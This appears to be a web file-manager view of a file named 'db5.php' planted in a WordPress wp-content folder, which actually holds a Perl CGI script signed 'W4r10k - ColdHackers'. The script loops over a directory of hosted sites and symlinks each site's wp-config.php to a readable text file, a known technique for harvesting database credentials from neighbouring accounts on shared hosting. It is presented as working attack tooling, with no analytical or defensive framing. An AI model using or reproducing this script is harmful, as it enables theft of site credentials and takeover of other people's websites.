File Manager / wp-content Search Upload New Item Settings File "db5.php" Full path: /home1/epichome/public_html/wp-content/db5.php File size: 60.67 B (60.67 KB bytes) MIME-type: text/x-php Charset: utf-8 Download Open Edit Advanced Editor Back
#!/usr/bin/perl -I/usr/local/bandmin
print "Content-type: text/html\n\n";
print'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Language" content="en-us" />
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>.:W4r10k - ColdHackers :.</title>
<style type="text/css">
.newStyle1 {
font-family: ubuntu;
font-size: x-large;
color: white;
background-color: black;
text-align: center;
}
p{
color:red;a
}
</style>
</head>
';
print '
<body class="newStyle1">
<p>.: Coded by W4r10k | ColdHackers :.</p>
<p>kuralinux@gmail.com</p>
';
opendir(my $dir , "/xxx/");
foreach(sort readdir $dir) {
my $isDir = 0;
$isDir = 1 if -d $_;
$sitess = $_;
symlink('/xxx/'.$sitess.'/xxx/wp-config.php',$sitess.'-wp13.txt');
}
print "<img src='https://i.ibb.co/HVfVVqP/67fa35-25c5a0f301d8431da1acf6ecd69f02e4.png' height='300'><br><br><font color=red>Done !! </font>";